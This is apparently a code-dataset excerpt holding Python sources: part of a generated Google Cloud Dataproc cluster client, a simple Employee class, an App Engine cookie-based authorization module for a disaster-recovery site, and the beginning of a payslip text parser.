>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # TODO: Initialize `cluster_name`:
>>> cluster_name = ''
>>>
>>> response = client.delete_cluster(project_id, region, cluster_name)
>>>
>>> def callback(operation_future):
... # Handle result.
... result = operation_future.result()
>>>
>>> response.add_done_callback(callback)
>>>
>>> # Handle metadata.
>>> metadata = response.metadata()
Args:
project_id (str): Required. The ID of the Google Cloud Platform project that the cluster
belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
cluster_name (str): Required. The cluster name.
cluster_uuid (str): Optional. Specifying the ``cluster_uuid`` means the RPC should fail
                (with error NOT\_FOUND) if a cluster with the specified UUID does not exist.
request_id (str): Optional. A unique id used to identify the request. If the server
receives two ``DeleteClusterRequest`` requests with the same id, then
the second request will be ignored and the first
``google.longrunning.Operation`` created and stored in the backend is
returned.
It is recommended to always set this value to a
`UUID <https://en.wikipedia.org/wiki/Universally_unique_identifier>`__.
The id must contain only letters (a-z, A-Z), numbers (0-9), underscores
(\_), and hyphens (-). The maximum length is 40 characters.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.dataproc_v1beta2.types._OperationFuture` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "delete_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"delete_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.delete_cluster,
default_retry=self._method_configs["DeleteCluster"].retry,
default_timeout=self._method_configs["DeleteCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.DeleteClusterRequest(
project_id=project_id,
region=region,
cluster_name=cluster_name,
cluster_uuid=cluster_uuid,
request_id=request_id,
)
operation = self._inner_api_calls["delete_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
empty_pb2.Empty,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def get_cluster(
self,
project_id,
region,
cluster_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets the resource representation for a cluster in a project.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # TODO: Initialize `cluster_name`:
>>> cluster_name = ''
>>>
>>> response = client.get_cluster(project_id, region, cluster_name)
Args:
project_id (str): Required. The ID of the Google Cloud Platform project that the cluster
belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
cluster_name (str): Required. The cluster name.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.dataproc_v1beta2.types.Cluster` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "get_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"get_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_cluster,
default_retry=self._method_configs["GetCluster"].retry,
default_timeout=self._method_configs["GetCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.GetClusterRequest(
project_id=project_id, region=region, cluster_name=cluster_name
)
return self._inner_api_calls["get_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_clusters(
self,
project_id,
region,
filter_=None,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Lists all regions/{region}/clusters in a project.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # Iterate over all results
>>> for element in client.list_clusters(project_id, region):
... # process element
... pass
>>>
>>>
>>> # Alternatively:
>>>
>>> # Iterate over results one page at a time
>>> for page in client.list_clusters(project_id, region).pages:
... for element in page:
... # process element
... pass
Args:
project_id (str): Required. The ID of the Google Cloud Platform project that the cluster
belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
filter_ (str): Optional. A filter constraining the clusters to list. Filters are
case-sensitive and have the following syntax:
field = value [AND [field = value]] ...
where **field** is one of ``status.state``, ``clusterName``, or
``labels.[KEY]``, and ``[KEY]`` is a label key. **value** can be ``*``
to match all values. ``status.state`` can be one of the following:
``ACTIVE``, ``INACTIVE``, ``CREATING``, ``RUNNING``, ``ERROR``,
``DELETING``, or ``UPDATING``. ``ACTIVE`` contains the ``CREATING``,
``UPDATING``, and ``RUNNING`` states. ``INACTIVE`` contains the
``DELETING`` and ``ERROR`` states. ``clusterName`` is the name of the
cluster provided at creation time. Only the logical ``AND`` operator is
supported; space-separated items are treated as having an implicit
``AND`` operator.
Example filter:
status.state = ACTIVE AND clusterName = mycluster AND labels.env =
staging AND labels.starred = \*
page_size (int): The maximum number of resources contained in the
underlying API response. If page streaming is performed per-
resource, this parameter does not affect the return value. If page
streaming is performed per-page, this determines the maximum number
of resources in a page.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.api_core.page_iterator.PageIterator` instance.
An iterable of :class:`~google.cloud.dataproc_v1beta2.types.Cluster` instances.
You can also iterate over the pages of the response
using its `pages` property.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "list_clusters" not in self._inner_api_calls:
self._inner_api_calls[
"list_clusters"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_clusters,
default_retry=self._method_configs["ListClusters"].retry,
default_timeout=self._method_configs["ListClusters"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.ListClustersRequest(
project_id=project_id, region=region, filter=filter_, page_size=page_size
)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_clusters"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="clusters",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
def diagnose_cluster(
self,
project_id,
region,
cluster_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Gets cluster diagnostic information. After the operation completes, the
Operation.response field contains ``DiagnoseClusterOutputLocation``.
Example:
>>> from google.cloud import dataproc_v1beta2
>>>
>>> client = dataproc_v1beta2.ClusterControllerClient()
>>>
>>> # TODO: Initialize `project_id`:
>>> project_id = ''
>>>
>>> # TODO: Initialize `region`:
>>> region = ''
>>>
>>> # TODO: Initialize `cluster_name`:
>>> cluster_name = ''
>>>
>>> response = client.diagnose_cluster(project_id, region, cluster_name)
>>>
>>> def callback(operation_future):
... # Handle result.
... result = operation_future.result()
>>>
>>> response.add_done_callback(callback)
>>>
>>> # Handle metadata.
>>> metadata = response.metadata()
Args:
project_id (str): Required. The ID of the Google Cloud Platform project that the cluster
belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the request.
cluster_name (str): Required. The cluster name.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will
be retried using a default configuration.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.dataproc_v1beta2.types._OperationFuture` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "diagnose_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"diagnose_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.diagnose_cluster,
default_retry=self._method_configs["DiagnoseCluster"].retry,
default_timeout=self._method_configs["DiagnoseCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.DiagnoseClusterRequest(
project_id=project_id, region=region, cluster_name=cluster_name
)
operation = self._inner_api_calls["diagnose_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
empty_pb2.Empty,
metadata_type=clusters_pb2.DiagnoseClusterResults,
)
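# --- Hedged usage sketch (not part of the generated client above) ---
# A minimal end-to-end example of driving this client; the project id,
# region and cluster config below are placeholders, not values taken from
# the original source.  Credentials could equally be supplied via
# ClusterControllerClient.from_service_account_file("/path/to/key.json").
if __name__ == "__main__":  # pragma: no cover
    client = ClusterControllerClient()
    cluster = {
        "cluster_name": "example-cluster",  # hypothetical name
        "config": {"gce_cluster_config": {"zone_uri": "us-central1-a"}},
    }
    # create_cluster() returns an OperationFuture; result() blocks until the
    # long-running operation finishes and yields the Cluster message.
    operation = client.create_cluster("my-project", "global", cluster)
    created = operation.result()
    print(created.cluster_name, created.status.state)
    # list_clusters() returns a page iterator of Cluster messages.
    for c in client.list_clusters("my-project", "global"):
        print(c.cluster_name)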
| 43.329897
| 164
| 0.588601
|
import functools
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.client_options
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import google.api_core.operation
import google.api_core.operations_v1
import google.api_core.page_iterator
import grpc
from google.cloud.dataproc_v1beta2.gapic import cluster_controller_client_config
from google.cloud.dataproc_v1beta2.gapic import enums
from google.cloud.dataproc_v1beta2.gapic.transports import (
cluster_controller_grpc_transport,
)
from google.cloud.dataproc_v1beta2.proto import autoscaling_policies_pb2
from google.cloud.dataproc_v1beta2.proto import autoscaling_policies_pb2_grpc
from google.cloud.dataproc_v1beta2.proto import clusters_pb2
from google.cloud.dataproc_v1beta2.proto import clusters_pb2_grpc
from google.cloud.dataproc_v1beta2.proto import operations_pb2 as proto_operations_pb2
from google.longrunning import operations_pb2 as longrunning_operations_pb2
from google.protobuf import duration_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-dataproc").version
class ClusterControllerClient(object):
SERVICE_ADDRESS = "dataproc.googleapis.com:443"
_INTERFACE_NAME = "google.cloud.dataproc.v1beta2.ClusterController"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
client_options=None,
):
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = cluster_controller_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
api_endpoint = self.SERVICE_ADDRESS
if client_options:
if type(client_options) == dict:
client_options = google.api_core.client_options.from_dict(
client_options
)
if client_options.api_endpoint:
api_endpoint = client_options.api_endpoint
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=cluster_controller_grpc_transport.ClusterControllerGrpcTransport,
address=api_endpoint,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = cluster_controller_grpc_transport.ClusterControllerGrpcTransport(
address=api_endpoint, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
self._inner_api_calls = {}
def create_cluster(
self,
project_id,
region,
cluster,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "create_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"create_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.create_cluster,
default_retry=self._method_configs["CreateCluster"].retry,
default_timeout=self._method_configs["CreateCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.CreateClusterRequest(
project_id=project_id, region=region, cluster=cluster, request_id=request_id
)
operation = self._inner_api_calls["create_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
clusters_pb2.Cluster,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def update_cluster(
self,
project_id,
region,
cluster_name,
cluster,
update_mask,
graceful_decommission_timeout=None,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "update_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"update_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.update_cluster,
default_retry=self._method_configs["UpdateCluster"].retry,
default_timeout=self._method_configs["UpdateCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.UpdateClusterRequest(
project_id=project_id,
region=region,
cluster_name=cluster_name,
cluster=cluster,
update_mask=update_mask,
graceful_decommission_timeout=graceful_decommission_timeout,
request_id=request_id,
)
operation = self._inner_api_calls["update_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
clusters_pb2.Cluster,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def delete_cluster(
self,
project_id,
region,
cluster_name,
cluster_uuid=None,
request_id=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "delete_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"delete_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.delete_cluster,
default_retry=self._method_configs["DeleteCluster"].retry,
default_timeout=self._method_configs["DeleteCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.DeleteClusterRequest(
project_id=project_id,
region=region,
cluster_name=cluster_name,
cluster_uuid=cluster_uuid,
request_id=request_id,
)
operation = self._inner_api_calls["delete_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
empty_pb2.Empty,
metadata_type=proto_operations_pb2.ClusterOperationMetadata,
)
def get_cluster(
self,
project_id,
region,
cluster_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "get_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"get_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_cluster,
default_retry=self._method_configs["GetCluster"].retry,
default_timeout=self._method_configs["GetCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.GetClusterRequest(
project_id=project_id, region=region, cluster_name=cluster_name
)
return self._inner_api_calls["get_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def list_clusters(
self,
project_id,
region,
filter_=None,
page_size=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "list_clusters" not in self._inner_api_calls:
self._inner_api_calls[
"list_clusters"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.list_clusters,
default_retry=self._method_configs["ListClusters"].retry,
default_timeout=self._method_configs["ListClusters"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.ListClustersRequest(
project_id=project_id, region=region, filter=filter_, page_size=page_size
)
iterator = google.api_core.page_iterator.GRPCIterator(
client=None,
method=functools.partial(
self._inner_api_calls["list_clusters"],
retry=retry,
timeout=timeout,
metadata=metadata,
),
request=request,
items_field="clusters",
request_token_field="page_token",
response_token_field="next_page_token",
)
return iterator
def diagnose_cluster(
self,
project_id,
region,
cluster_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "diagnose_cluster" not in self._inner_api_calls:
self._inner_api_calls[
"diagnose_cluster"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.diagnose_cluster,
default_retry=self._method_configs["DiagnoseCluster"].retry,
default_timeout=self._method_configs["DiagnoseCluster"].timeout,
client_info=self._client_info,
)
request = clusters_pb2.DiagnoseClusterRequest(
project_id=project_id, region=region, cluster_name=cluster_name
)
operation = self._inner_api_calls["diagnose_cluster"](
request, retry=retry, timeout=timeout, metadata=metadata
)
return google.api_core.operation.from_gapic(
operation,
self.transport._operations_client,
empty_pb2.Empty,
metadata_type=clusters_pb2.DiagnoseClusterResults,
)
| true
| true
|
1c4229d82360abfecb0c9b9eeb6d19c89a7b1ea2
| 468
|
py
|
Python
|
touchpoint/employee.py
|
zappospizza/touchpoint-python
|
19572c0c1360408dd980ed95e852046dcdba3623
|
[
"MIT"
] | null | null | null |
touchpoint/employee.py
|
zappospizza/touchpoint-python
|
19572c0c1360408dd980ed95e852046dcdba3623
|
[
"MIT"
] | null | null | null |
touchpoint/employee.py
|
zappospizza/touchpoint-python
|
19572c0c1360408dd980ed95e852046dcdba3623
|
[
"MIT"
] | null | null | null |
# touchpoint/employee.py
class Employee():
def __init__(self, employee_id, first_name=None, last_name=None, emp_id=None):
self.employee_id = employee_id
self.first_name = first_name
self.last_name = last_name
self.emp_id = emp_id
def info(self):
return {'employee_id': self.employee_id,
'emp_id': self.emp_id,
'first_name': self.first_name,
'last_name': self.last_name}
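# --- Hedged example (not part of the original module) ---
# Constructing an Employee and reading it back as a dict; the ids and names
# below are made up.
if __name__ == "__main__":
    e = Employee("E-1001", first_name="Ada", last_name="Lovelace", emp_id=7)
    print(e.info())
    # -> {'employee_id': 'E-1001', 'emp_id': 7,
    #     'first_name': 'Ada', 'last_name': 'Lovelace'}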
| 31.2
| 82
| 0.617521
|
class Employee():
def __init__(self, employee_id, first_name=None, last_name=None, emp_id=None):
self.employee_id = employee_id
self.first_name = first_name
self.last_name = last_name
self.emp_id = emp_id
def info(self):
return {'employee_id': self.employee_id,
'emp_id': self.emp_id,
'first_name': self.first_name,
'last_name': self.last_name}
| true
| true
|
1c422bf19b2171922a496659c3a4345cf5fbb0b3
| 4,397
|
py
|
Python
|
sandy-disaster-recovery/key.py
|
toddjcrane/crisiscleanup-legacy
|
74dbad143ebc3bfae4cc5afc478e43ab4033ff69
|
[
"Apache-2.0"
] | 1
|
2017-01-07T21:44:21.000Z
|
2017-01-07T21:44:21.000Z
|
sandy-disaster-recovery/key.py
|
aarontitus/crisiscleanup-legacy
|
74dbad143ebc3bfae4cc5afc478e43ab4033ff69
|
[
"Apache-2.0"
] | 1
|
2021-03-26T00:25:19.000Z
|
2021-03-26T00:25:19.000Z
|
sandy-disaster-recovery/key.py
|
toddjcrane/crisiscleanup-legacy
|
74dbad143ebc3bfae4cc5afc478e43ab4033ff69
|
[
"Apache-2.0"
] | 1
|
2017-09-07T09:52:15.000Z
|
2017-09-07T09:52:15.000Z
|
#!/usr/bin/env python
#
# Copyright 2012 Jeremy Pack
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.appengine.ext import db
import Cookie
import datetime
import hashlib
import organization
from google.appengine.api import memcache
import cache
import event_db
class Key(db.Model):
secret_key = db.StringProperty(required = True)
date = db.DateTimeProperty(required = True, auto_now_add = True)
def hashOrganization(self, org):
h = hashlib.md5()
h.update(self.secret_key)
h.update(org.name)
h.update(org.password)
h.update(str(self.key().id()))
return h.hexdigest()
def getCookie(self, org, event):
cookie = Cookie.SimpleCookie("")
cookie["sandy-recovery-auth"] = (
":".join([self.hashOrganization(org),
str(self.key().id()),
str(org.key().id()),
str(event.key().id())]))
cookie["sandy-recovery-auth"]["domain"] = ""
if not org.only_session_authentication:
expires = datetime.datetime.now() + datetime.timedelta(days = 1)
cookie["sandy-recovery-auth"]["expires"] = (
expires.strftime('%a, %d %b %Y %H:%M:%S'))
return str(cookie)
one_week_in_seconds = 604800
def GetCached(key_id):
return cache.GetCachedById(Key, one_week_in_seconds, key_id)
def GetAndCache(key_id):
return cache.GetAndCache(Key, one_week_in_seconds, key_id)
def GetDeleteCookie():
cookie = Cookie.SimpleCookie("")
cookie["sandy-recovery-auth"] = ""
cookie["sandy-recovery-auth"]["domain"] = ""
expires = datetime.datetime.now() - datetime.timedelta(days = 7)
cookie["sandy-recovery-auth"]["expires"] = (
expires.strftime('%a, %d %b %Y %H:%M:%S'))
return str(cookie)
def getIntOrNone(s):
try:
return int(s)
except ValueError:
return None
def CheckAuthorization(request):
if "Cookie" in request.headers.keys():
cookie = Cookie.SimpleCookie(request.headers["Cookie"])
if "sandy-recovery-auth" in cookie.keys():
contents = cookie["sandy-recovery-auth"].value
if contents:
parts = contents.split(":")
if len(parts) == 4:
event_id = getIntOrNone(parts[3])
org_id = getIntOrNone(parts[2])
key_id = getIntOrNone(parts[1])
if org_id and key_id and event_id:
org_key = cache.GetKey(organization.Organization, org_id)
key_key = cache.GetKey(Key, key_id)
event_key = cache.GetKey(event_db.Event, event_id)
##org = cache.local_cache.Get(org_key)
org = None # hacked out to force lookup
key = cache.local_cache.Get(key_key)
event = cache.local_cache.Get(event_key)
if not event or not key or not org:
results = memcache.get_multi([org_key, key_key, event_key])
##org = results.get(org_key)
org = None # hacked out to force lookup
key = results.get(key_key)
event = results.get(event_key)
cache.local_cache.Set(org_key, org, 600)
cache.local_cache.Set(key_key, key, 600)
cache.local_cache.Set(event_key, event, 600)
if not org:
org = organization.GetAndCache(org_id)
if not key:
key = GetAndCache(key_id)
if not event:
event = event_db.GetAndCache(event_id)
# Check the age of the key, and delete it
# if it is too old.
if key:
age = datetime.datetime.now() - key.date
if age.days > 14:
key.delete()
key = None
# check the secret org hash and event access
if org and key and event:
secret_matches = (parts[0] == key.hashOrganization(org))
if secret_matches and org.may_access(event):
return org, event
return None, None
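# --- Hedged illustration (not part of the original module) ---
# The auth cookie value built by Key.getCookie() is four colon-separated
# fields: "<md5 hash>:<key id>:<org id>:<event id>".  A standalone check of
# the parsing step used by CheckAuthorization(), with made-up ids:
def _demo_parse_auth_cookie():
    contents = "d41d8cd98f00b204e9800998ecf8427e:12:34:56"
    parts = contents.split(":")
    assert len(parts) == 4
    event_id = getIntOrNone(parts[3])
    org_id = getIntOrNone(parts[2])
    key_id = getIntOrNone(parts[1])
    return key_id, org_id, event_id  # (12, 34, 56)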
| 35.176
| 74
| 0.626791
|
from google.appengine.ext import db
import Cookie
import datetime
import hashlib
import organization
from google.appengine.api import memcache
import cache
import event_db
class Key(db.Model):
secret_key = db.StringProperty(required = True)
date = db.DateTimeProperty(required = True, auto_now_add = True)
def hashOrganization(self, org):
h = hashlib.md5()
h.update(self.secret_key)
h.update(org.name)
h.update(org.password)
h.update(str(self.key().id()))
return h.hexdigest()
def getCookie(self, org, event):
cookie = Cookie.SimpleCookie("")
cookie["sandy-recovery-auth"] = (
":".join([self.hashOrganization(org),
str(self.key().id()),
str(org.key().id()),
str(event.key().id())]))
cookie["sandy-recovery-auth"]["domain"] = ""
if not org.only_session_authentication:
expires = datetime.datetime.now() + datetime.timedelta(days = 1)
cookie["sandy-recovery-auth"]["expires"] = (
expires.strftime('%a, %d %b %Y %H:%M:%S'))
return str(cookie)
one_week_in_seconds = 604800
def GetCached(key_id):
return cache.GetCachedById(Key, one_week_in_seconds, key_id)
def GetAndCache(key_id):
return cache.GetAndCache(Key, one_week_in_seconds, key_id)
def GetDeleteCookie():
cookie = Cookie.SimpleCookie("")
cookie["sandy-recovery-auth"] = ""
cookie["sandy-recovery-auth"]["domain"] = ""
expires = datetime.datetime.now() - datetime.timedelta(days = 7)
cookie["sandy-recovery-auth"]["expires"] = (
expires.strftime('%a, %d %b %Y %H:%M:%S'))
return str(cookie)
def getIntOrNone(s):
try:
return int(s)
except ValueError:
return None
def CheckAuthorization(request):
if "Cookie" in request.headers.keys():
cookie = Cookie.SimpleCookie(request.headers["Cookie"])
if "sandy-recovery-auth" in cookie.keys():
contents = cookie["sandy-recovery-auth"].value
if contents:
parts = contents.split(":")
if len(parts) == 4:
event_id = getIntOrNone(parts[3])
org_id = getIntOrNone(parts[2])
key_id = getIntOrNone(parts[1])
if org_id and key_id and event_id:
org_key = cache.GetKey(organization.Organization, org_id)
key_key = cache.GetKey(Key, key_id)
event_key = cache.GetKey(event_db.Event, event_id)
                        org = None
                        key = cache.local_cache.Get(key_key)
event = cache.local_cache.Get(event_key)
if not event or not key or not org:
results = memcache.get_multi([org_key, key_key, event_key])
key = results.get(key_key)
event = results.get(event_key)
cache.local_cache.Set(org_key, org, 600)
cache.local_cache.Set(key_key, key, 600)
cache.local_cache.Set(event_key, event, 600)
if not org:
org = organization.GetAndCache(org_id)
if not key:
key = GetAndCache(key_id)
if not event:
event = event_db.GetAndCache(event_id)
if key:
age = datetime.datetime.now() - key.date
if age.days > 14:
key.delete()
key = None
if org and key and event:
secret_matches = (parts[0] == key.hashOrganization(org))
if secret_matches and org.may_access(event):
return org, event
return None, None
| true
| true
|
1c422bf79ecd435d6fec656ed68ebd798c8bf2b3
| 6,981
|
py
|
Python
|
parser.py
|
shtratos/ms-uk-payslip-parser
|
6372ca671d1942cb6d3cd54f6e22cce1dd6852cd
|
[
"MIT"
] | 3
|
2019-12-09T15:32:51.000Z
|
2021-02-08T14:10:30.000Z
|
parser.py
|
shtratos/ms-uk-payslip-parser
|
6372ca671d1942cb6d3cd54f6e22cce1dd6852cd
|
[
"MIT"
] | null | null | null |
parser.py
|
shtratos/ms-uk-payslip-parser
|
6372ca671d1942cb6d3cd54f6e22cce1dd6852cd
|
[
"MIT"
] | 1
|
2022-01-08T16:18:38.000Z
|
2022-01-08T16:18:38.000Z
|
import collections
import csv
import re
import sys
from collections import OrderedDict
from pathlib import Path
HEADER_FIELD = '.m.Pay Date'
FIELDS_ORDER = [
HEADER_FIELD, '.m.Pay', '.m.',
'.d.p',
'.d.d',
'.d.t',
'.d.et',
'.d.ytd',
]
UNWANTED_FIELDS = [
'.m.Company Name', '.m.Account', '.m.Sort Code', '.m.NI Number', '.m.NI Category', '.m.Pay Method',
]
def parse_amount(amount: str):
amount = amount.replace(',', '')
if amount.endswith('-'):
return -float(amount[:-1])
else:
return float(amount)
def parse_metadata(metadata_text: str):
metadata = {}
for row in metadata_text.splitlines():
if not row:
continue
_, cell1, cell2, cell3, _ = row.split('|')
for cell in [cell1, cell2, cell3]:
cell = cell.strip()
if cell:
separator_regex = r':\s+' if ':' in cell else r'\s\s+'
item, value = re.compile(separator_regex).split(cell, maxsplit=1)
metadata[item.strip()] = value.strip()
return metadata
def parse_payments_table(payments_table: str):
payments = {}
deductions = {}
ytd_balances = {}
for row in payments_table.splitlines():
row = row.strip()
if not row:
continue
_, payment, deduction, ytd_balance, _ = row.split('|')
payment = payment.strip()
if payment:
payment_item, amount = re.compile(r'\s\s+').split(payment)
payments[payment_item] = parse_amount(amount)
deduction = deduction.strip()
if deduction:
deduction_item, amount = re.compile(r'\s\s+').split(deduction)
deductions[deduction_item] = parse_amount(amount)
ytd_balance = ytd_balance.strip()
if ytd_balance:
ytd_balance_item, amount = re.compile(r'\s\s+').split(ytd_balance)
ytd_balances[ytd_balance_item] = parse_amount(amount)
return payments, deductions, ytd_balances
def parse_totals(totals_row: str):
totals = {}
_, payment_total, deduction_total, net_pay, _ = totals_row.split('|')
for total_value in [payment_total, deduction_total, net_pay]:
item, amount = re.compile(r':\s+').split(total_value.strip())
totals[item] = parse_amount(amount)
return totals
def parse_employer_totals(employer_total_footer):
totals = {}
for row in employer_total_footer.strip().splitlines()[1:]:
row = row.strip()
if not row or row.count('|') != 4:
continue
_, this_employer_cell, _ = row.split('|', maxsplit=2)
item, amount = re.compile(r'\s\s+').split(this_employer_cell.strip())
totals[item] = parse_amount(amount)
return totals
def parse_payslip(payslip_text: str):
